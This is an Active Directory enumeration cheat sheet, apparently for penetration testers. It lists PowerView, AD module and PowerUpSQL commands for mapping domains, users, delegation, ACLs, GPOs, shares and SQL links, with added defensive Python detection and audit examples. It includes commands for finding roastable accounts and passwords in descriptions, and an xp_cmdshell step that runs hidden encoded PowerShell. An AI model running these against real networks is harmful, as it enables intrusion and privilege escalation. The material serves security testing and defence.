Active Directory
Introduction
Once an attacker has obtained a foothold on a computer inside an Active Directory network, the next step is to understand the domain's design: the number of users, groups, computers, OUs and ACLs, and the relationships between them.
In this phase the attacker focuses on enumerating information that can later be used to escalate privileges or move laterally.
Domain
General Information
Get current domain
Get-Domain [-Domain <DIFFERENT_DOMAIN>]
Get current domain controller
Get-DomainController [-Domain <DIFFERENT_DOMAIN>] | select Forest, Name, OSVersion | fl
Get domain policy data (the original entry repeated the Get-DomainController command above; PowerView's policy cmdlet is Get-DomainPolicyData)
Get-DomainPolicyData [-Domain <DIFFERENT_DOMAIN>]
Forest
Return the forest object
Get-Forest [-Forest <FOREST>]
Get all domains from your current forest
Get-ForestDomain [-Forest <FOREST>]
Get the Global Catalogs of the forest
Get-ForestGlobalCatalog [-Forest <FOREST>]
Trust
Return all domain trusts for the current or specified domain
Get-DomainTrust [-Domain <DomainName>]
Enumerates all trusts for the current domain and then all trusts for each domain it finds.
Get-DomainTrustMapping
Return all forest trusts for the current forest or a specified forest.
Get-ForestTrust [-Forest <FOREST>]
Users
General Information
Obtain users
Get-DomainUser -Identity <USERNAME> [-Properties DisplayName, MemberOf | fl]
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname
Built-in accounts
Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name, Description
Get group memberships
Get-DomainGroup -UserName "<USERNAME>"
Obtain the last time the password was set for each user (pwdLastSet is a Windows FILETIME, so it must be converted; the original used $_pwdlastset instead of $_.pwdlastset)
Get-ADUser -Filter * -Properties * | select name, logoncount, @{Name='PasswordLastSet'; Expression={[datetime]::FromFileTime($_.pwdlastset)}}
Finds domain machines where specific users are logged in; by default members of 'Domain Admins'.
Find-DomainUserLocation -Verbose [-CheckAccess] [{-UserGroupIdentity|-UserIdentity} <Identity>]
Security
Kerberoast
Get-DomainUser -SPN | select serviceprincipalname
AS-REP roast
Get-DomainUser -PreauthNotRequired -Verbose
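The two commands above list the accounts that are exposed to Kerberoasting (user accounts with an SPN) and AS-REP roasting (accounts with Kerberos pre-authentication disabled). The other side of that coin is spotting the activity in the domain controller's Security log. The following is an added example, not part of the original cheat sheet: it runs two detections over constructed 4769/4768 event records shaped like the Security log fields (TicketEncryptionType 0x17 = RC4-HMAC, PreAuthType 0 = logon without pre-authentication). The five-service / five-minute threshold is an assumption to tune per environment, and the sample records are constructed, not real data.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records in the shape of the Security log fields for
# event 4769 (service ticket request) and 4768 (TGT request). Not real data.
SAMPLE_EVENTS = [
    {"id": 4769, "time": "2024-05-01T09:00:01", "account": "jdoe@CORP.LOCAL", "service": "svc_sql", "etype": "0x17"},
    {"id": 4769, "time": "2024-05-01T09:00:02", "account": "jdoe@CORP.LOCAL", "service": "svc_web", "etype": "0x17"},
    {"id": 4769, "time": "2024-05-01T09:00:03", "account": "jdoe@CORP.LOCAL", "service": "svc_backup", "etype": "0x17"},
    {"id": 4769, "time": "2024-05-01T09:00:04", "account": "jdoe@CORP.LOCAL", "service": "svc_ldap", "etype": "0x17"},
    {"id": 4769, "time": "2024-05-01T09:00:05", "account": "jdoe@CORP.LOCAL", "service": "svc_print", "etype": "0x17"},
    # Normal AES (0x12) ticket for one service: not roasting activity.
    {"id": 4769, "time": "2024-05-01T10:15:00", "account": "asmith@CORP.LOCAL", "service": "svc_sql", "etype": "0x12"},
    # TGT requests: preauth_type 2 = encrypted timestamp, 0 = no pre-authentication.
    {"id": 4768, "time": "2024-05-01T11:00:00", "account": "asmith", "preauth_type": 2, "etype": "0x12"},
    {"id": 4768, "time": "2024-05-01T11:00:01", "account": "svc_legacy", "preauth_type": 0, "etype": "0x17"},
]

RC4_HMAC = "0x17"   # TicketEncryptionType value for RC4-HMAC
NO_PREAUTH = 0      # PreAuthType 0 = "Logon without Pre-Authentication"


def find_kerberoast_bursts(events, window=timedelta(minutes=5), min_services=5):
    """Accounts that obtained RC4 service tickets for at least `min_services`
    distinct services within `window`. Returns {account: sorted service list}.
    Threshold and window are assumptions; tune them to the environment."""
    per_account = defaultdict(list)
    for e in events:
        if e["id"] == 4769 and e["etype"].lower() == RC4_HMAC:
            per_account[e["account"]].append((datetime.fromisoformat(e["time"]), e["service"]))
    flagged = {}
    for account, requests in per_account.items():
        requests.sort()  # sliding window over the account's requests in time order
        for i, (start, _) in enumerate(requests):
            in_window = {svc for t, svc in requests[i:] if t - start <= window}
            if len(in_window) >= min_services:
                flagged[account] = sorted(in_window)
                break
    return flagged


def find_no_preauth_requests(events):
    """Accounts whose TGT requests (4768) were served without pre-authentication,
    i.e. the accounts the AS-REP roast command above enumerates."""
    return sorted({e["account"] for e in events
                   if e["id"] == 4768 and e.get("preauth_type") == NO_PREAUTH})


if __name__ == "__main__":
    for account, services in find_kerberoast_bursts(SAMPLE_EVENTS).items():
        print(f"RC4 service ticket burst by {account}: {', '.join(services)}")
    for account in find_no_preauth_requests(SAMPLE_EVENTS):
        print(f"TGT issued without pre-authentication: {account}")
```

The RC4 filter keeps noise down because modern clients request AES tickets, but a service account that has never had AES keys will legitimately produce 0x17 tickets, so treat a hit as a triage lead rather than proof. The durable fix is on the account side: long random passwords or gMSAs for SPN-bearing accounts, AES-only keys, and clearing "Do not require Kerberos preauthentication" wherever it is set.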
Search passwords on the description attribute
Get-ADUser -Filter 'Description -like "*pass*"' -Properties Description | select name, Description
Show on which machines you are local admin (based on your current privileges)
Find-LocalAdminAccess
Constrained delegation
Get-NetUser -TrustedToAuth
Groups
List all the groups in the current domain
Get-DomainGroup [| where Name -like "*Admins*" | select SamAccountName]
List all the members in a specific group:
Get-DomainGroupMember -Identity "Domain Admins" [| select MemberDistinguishedName]
List groups of a user
Get-ADPrincipalGroupMembership <USER>
Get GPOs of a group
Get-DomainGPOUserLocalGroupMapping [-Identity "<GROUP_NAME>" | -LocalGroup Administrators] | select ObjectName, GPODisplayName, ContainerName, ComputerName | fl
Computers
General information
List computers
Get-NetComputer [| select samaccountname, DnsHostName, operatingsystem]
Get-DomainComputer -OperatingSystem "*Server 2016*"
# Get Name, IP and Operating System
Get-NetComputer -Properties name,dnshostname, OperatingSystem | ForEach-Object { $_ | Add-Member -NotePropertyName IPAddressV4 -NotePropertyValue (Resolve-DnsName -Type A -Name $_.dnshostname).IPAddress -Force; $_ } | Select-object -Property name,dnshostname,IPAddressV4, OperatingSystem | Format-Table -AutoSize
Return PCs that can be pinged
Get-NetComputer -Ping
Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName | fl Address,IPV4Address,IPV6Address,ResponseTime}
Get users logged on (Requires admin privileges)
Get-NetLoggedon -ComputerName "<COMPUTER_NAME>" | Select Username
Get locally logged on users
Get-LoggedonLocal -ComputerName "<HOSTNAME>"
Enumerates local groups on a machine (requires admin privileges).
Get-NetLocalGroup -ComputerName "<HOSTNAME>"
# Get the members of Local Groups
Get-NetLocalGroupMember -ComputerName "<HOSTNAME>" -GroupName "<GROUP_NAME>"
Returns the last user who logged onto the local machine (Requires administrative rights and remote registry enabled on the target)
Get-LastLoggedOn -ComputerName <HOSTNAME>
Security
Enumerate all ACEs on domain computer objects that are granted to the current user (the identity is matched against $env:UserDomain\$env:Username).
Get-DomainComputer | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_ | Select-object -Property ObjectDN,ActiveDirectoryRights, AceType,ObjectAceType, Identity | Format-List}}
Computers with unconstrained delegation (exploitation covered under Unconstrained Delegation):
Get-DomainComputer -UnConstrained | select samaccountname
Computers with constrained delegation (exploitation covered under Constrained Delegation):
Get-DomainComputer -TrustedToAuth | select name,msds-allowedtodelegateto,useraccountcontrol | fl
Get-NetComputer | where-object {$_."msds-allowedtodelegateto" -ne $null} | select name, msds-allowedtodelegateto, useraccountcontrol | fl
Get-NetComputer <COMPUTER_NAME> | Select-Object -ExpandProperty msds-allowedtodelegateto | fl
Resource-Based Constrained Delegation (exploitation covered under Resource-Based Constrained Delegation, GenericWrite to Computer):
Requires a right such as WriteProperty, GenericAll, GenericWrite or WriteDacl on the computer object:
Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }
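The -PreauthNotRequired, -TrustedToAuth and -UnConstrained switches used in the Users and Computers sections are all filters on bits of the userAccountControl attribute. The following is an added example, not code from the cheat sheet or from PowerView: it decodes those bits from a constructed LDAP export and reports, per enabled account, the delegation and Kerberos settings a reviewer would want to see before anyone else finds them. The flag values are Microsoft's documented userAccountControl bits; the sample objects, attribute names (sam, uac, spn, delegate_to) and finding labels are constructed for the example.

```python
# userAccountControl bit values as documented by Microsoft for the attribute.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",               # set on domain controllers
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",            # unconstrained delegation (-UnConstrained)
    0x100000: "NOT_DELEGATED",                    # "Account is sensitive and cannot be delegated"
    0x400000: "DONT_REQ_PREAUTH",                 # -PreauthNotRequired
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",  # constrained delegation with protocol transition (-TrustedToAuth)
}


def decode_uac(value):
    """Translate a userAccountControl integer into the set of flag names it carries."""
    return {name for bit, name in UAC_FLAGS.items() if value & bit}


# Constructed sample in the shape of an LDAP export (sAMAccountName,
# userAccountControl, servicePrincipalName, msDS-AllowedToDelegateTo). Not a real directory.
SAMPLE_OBJECTS = [
    {"sam": "DC01$", "uac": 0x82000, "spn": ["ldap/dc01.corp.local"], "delegate_to": []},        # DC: unconstrained is expected
    {"sam": "WEB01$", "uac": 0x81000, "spn": ["HOST/web01.corp.local"], "delegate_to": []},      # member server with unconstrained delegation
    {"sam": "svc_sql", "uac": 0x10200, "spn": ["MSSQLSvc/sql01.corp.local:1433"], "delegate_to": []},  # user account carrying an SPN
    {"sam": "svc_legacy", "uac": 0x400200, "spn": [], "delegate_to": []},                        # pre-authentication disabled
    {"sam": "APP01$", "uac": 0x1001000, "spn": ["HOST/app01.corp.local"], "delegate_to": ["cifs/fs01.corp.local"]},  # protocol transition
    {"sam": "old_admin", "uac": 0x400202, "spn": [], "delegate_to": []},                         # disabled: skipped
    {"sam": "ceo", "uac": 0x100200, "spn": [], "delegate_to": []},                               # NOT_DELEGATED: protected, nothing to report
]


def audit_delegation(objects):
    """Map each enabled account to the delegation/Kerberos weaknesses it carries;
    accounts with nothing to report are omitted from the result."""
    findings = {}
    for obj in objects:
        flags = decode_uac(obj["uac"])
        if "ACCOUNTDISABLE" in flags:
            continue  # cannot authenticate; track disabled accounts separately if needed
        is_computer = bool(flags & {"WORKSTATION_TRUST_ACCOUNT", "SERVER_TRUST_ACCOUNT"})
        is_dc = "SERVER_TRUST_ACCOUNT" in flags
        issues = []
        if "TRUSTED_FOR_DELEGATION" in flags and not is_dc:
            issues.append("unconstrained delegation")  # expected only on domain controllers
        if "TRUSTED_TO_AUTH_FOR_DELEGATION" in flags:
            issues.append("constrained delegation with protocol transition")
        elif obj["delegate_to"]:
            issues.append("constrained delegation")
        if "DONT_REQ_PREAUTH" in flags:
            issues.append("Kerberos pre-authentication not required")
        if obj["spn"] and not is_computer:
            issues.append("user account with SPN")
        if issues:
            findings[obj["sam"]] = issues
    return findings


if __name__ == "__main__":
    for sam, issues in audit_delegation(SAMPLE_OBJECTS).items():
        print(f"{sam}: {'; '.join(issues)}")
```

Unconstrained delegation on anything other than a domain controller is the finding to clear first, since that host collects the TGTs of every principal that authenticates to it. For the accounts that must not be impersonated at all (tier-0 admins and the like), setting NOT_DELEGATED or adding them to the Protected Users group makes delegation settings on other objects irrelevant to them, which is why the sample's "ceo" account produces no finding.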
Group Policy Objects (GPOs)
General information
Get list of GPO in current domain.
Get-DomainGPO [-ComputerIdentity <COMPUTER_NAME>] -Properties DisplayName | sort -Property DisplayName
Returns all GPOs that modify local group membership through Restricted Groups or Group Policy Preferences:
Get-DomainGPOLocalGroup [-ComputerIdentity <COMPUTER_NAME>] | select GPODisplayName, GroupName
Enumerates the machines where a specific domain user/group is a member of a specific local group (useful for finding where domain groups have local admin access):
Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName | fl
Finds what users/groups are in the specified local group for a target machine through GPO correlation
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity "<HOSTNAME>"
Get Modifiable GPOs
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty|GenericWrite" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }
Principals with "Create groupPolicyContainer objects" privilege
Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier }
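The ACL filters in the RBCD and "Get Modifiable GPOs" commands above share one idea: keep only allow ACEs that grant a write-class right, and keep only principals whose SID is the domain SID followed by a RID of four to ten digits, which drops built-in groups (S-1-5-32-*), well-known SIDs such as SYSTEM and the default RIDs below 1000 (512 Domain Admins, 519 Enterprise Admins, ...) that are expected in every ACL. The following is an added example, not part of the cheat sheet or of PowerView: it implements that triage over constructed ACE records shaped like Get-DomainObjectAcl output, with an allowlist for principals you have already reviewed. The domain SID is the one used in the page's own filters; the GPO DN, group RIDs and ACE records are constructed for the example.

```python
import re

# Domain SID taken from the filters in the commands above; replace with your own.
DOMAIN_SID = "S-1-5-21-569305411-121244042-2357301523"

# Rights that let the holder change the object or its security descriptor.
WRITE_RIGHTS = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner", "WriteProperty", "CreateChild"}

SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")


def is_custom_domain_principal(sid, domain_sid=DOMAIN_SID):
    """True for principals of our domain with RID >= 1000, i.e. created after domain
    setup. Built-in groups, well-known SIDs and default RIDs below 1000 are dropped,
    which is what the four-to-ten-digit RID pattern in the commands above achieves."""
    match = SID_RE.match(sid)
    return bool(match) and match.group(1) == domain_sid and int(match.group(2)) >= 1000


def parse_rights(rights):
    """Split PowerView's comma-separated ActiveDirectoryRights rendering into a set."""
    return {r.strip() for r in rights.split(",") if r.strip()}


def triage_aces(aces, domain_sid=DOMAIN_SID, expected_principals=frozenset()):
    """Return allow ACEs that grant write-class rights to non-default domain principals
    that are not on the `expected_principals` allowlist (a list you maintain)."""
    findings = []
    for ace in aces:
        if not ace.get("AceType", "AccessAllowed").startswith("AccessAllowed"):
            continue  # deny ACEs grant nothing
        sid = ace["SecurityIdentifier"]
        if not is_custom_domain_principal(sid, domain_sid) or sid in expected_principals:
            continue
        granted = parse_rights(ace["ActiveDirectoryRights"]) & WRITE_RIGHTS
        if granted:
            findings.append({"object": ace["ObjectDN"], "principal": sid, "rights": sorted(granted)})
    return findings


# Constructed ACE records in the shape of Get-DomainObjectAcl output; not real data.
GPO_DN = "CN={11111111-2222-3333-4444-555555555555},CN=Policies,CN=System,DC=corp,DC=local"
SAMPLE_ACES = [
    {"ObjectDN": GPO_DN, "ActiveDirectoryRights": "GenericAll", "AceType": "AccessAllowed",
     "SecurityIdentifier": DOMAIN_SID + "-512"},                                   # Domain Admins: default, skipped
    {"ObjectDN": GPO_DN, "ActiveDirectoryRights": "GenericAll", "AceType": "AccessAllowed",
     "SecurityIdentifier": "S-1-5-18"},                                             # SYSTEM: not a domain principal, skipped
    {"ObjectDN": GPO_DN, "ActiveDirectoryRights": "ReadProperty, WriteProperty, GenericExecute",
     "AceType": "AccessAllowedObject", "SecurityIdentifier": DOMAIN_SID + "-1105"},  # constructed helpdesk group: reported
    {"ObjectDN": GPO_DN, "ActiveDirectoryRights": "ReadProperty, GenericExecute",
     "AceType": "AccessAllowed", "SecurityIdentifier": DOMAIN_SID + "-1106"},        # read-only: fine
    {"ObjectDN": "CN=WS01,OU=Workstations,DC=corp,DC=local", "ActiveDirectoryRights": "GenericWrite",
     "AceType": "AccessAllowed", "SecurityIdentifier": DOMAIN_SID + "-1107"},        # write on a computer object: reported
    {"ObjectDN": GPO_DN, "ActiveDirectoryRights": "GenericAll", "AceType": "AccessDenied",
     "SecurityIdentifier": DOMAIN_SID + "-1108"},                                   # deny ACE: skipped
    {"ObjectDN": "OU=Servers,DC=corp,DC=local", "ActiveDirectoryRights": "CreateChild, WriteDacl",
     "AceType": "AccessAllowed", "SecurityIdentifier": DOMAIN_SID + "-1109"},        # reported unless allowlisted
]


if __name__ == "__main__":
    for f in triage_aces(SAMPLE_ACES, expected_principals={DOMAIN_SID + "-1109"}):
        print(f"{f['principal']} has {', '.join(f['rights'])} on {f['object']}")
```

Two caveats when using this on a real export: the RID filter deliberately hides the default privileged groups, so it is a hygiene check for delegated permissions rather than a complete picture of who controls an object, and inherited ACEs will surface once per child object, so dedupe by principal and inheritance source before raising tickets.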
Organizational Units (OU)
Get Domain Organizational Units:
Get-DomainOU [-Properties Name | sort -Property Name]
Get GPO applied to an OU
Get-DomainGPO -Identity "<GPLink_RelativeCN>"
Access Control Lists (ACLs)
Enumerate user rights:
Get-ObjectAcl -SamAccountName "<USER>" -ResolveGUIDs
Returns the ACLs associated with a specific Active Directory object.
Get-DomainObjectAcl -ResolveGUIDs -SamAccountName "<USERNAME>"
Finds interesting object ACLs in the current domain
Find-InterestingDomainAcl -ResolveGUIDs
Enumerate RDP Users permissions
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
Shares
Enumerate shares:
Find-DomainShare
# Enumerate the domain shares the current user has access to
Find-DomainShare -CheckShareAccess
Find shares on hosts in current domain.
Invoke-ShareFinder -Verbose
Get all fileservers of the domain
Get-NetFileServer
Searches for files matching specific criteria on readable shares in the domain
Invoke-FileFinder -Verbose
MSSQL
General information
Discover Active Directory Domain SQL Server Instances
Get-SQLInstanceDomain
Tests whether the current Windows account or a provided SQL Server login can log into a SQL Server.
Get-SQLConnectionTest -Instance "<HOSTNAME,PORT>" | fl
# If there are several instances, use the following one-liner
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
Returns basic server and user information from target SQL Servers.
Get-SQLServerInfo -Instance "<HOSTNAME,PORT>"
Links
Look for links to remote servers
Get-SQLServerLink -Verbose -Instance "<HOSTNAME,PORT>"
Enumerate and follow MSSQL database links
Get-SQLServerLinkCrawl -Verbose -Instance "<HOSTNAME,PORT>"
Perform Queries
Perform queries
Get-SQLQuery -Instance "<HOSTNAME,PORT>" -Query "select @@servername"
Perform queries using the linked database
SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername');
CMDShell
Check if xp_cmdshell module is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell'
Enable xp_cmdshell
sp_configure 'Show Advanced Options', 1; RECONFIGURE; sp_configure 'xp_cmdshell', 1; RECONFIGURE;
Execute commands
EXEC xp_cmdshell 'powershell -w hidden -enc <ENCODED_COMMAND>';
Tools
LinWinPwn: Automates a number of Active Directory Enumeration and Vulnerability checks.
PowerView: PowerShell tool to gain network situational awareness on Windows domains.
ADSearch: Perform LDAP queries.
PowerUpSQL: Module that includes functions that support SQL Server discovery, weak configuration auditing, privilege escalation at scale, and post-exploitation actions such as OS command execution.
ADModule: The Active Directory module for Windows PowerShell.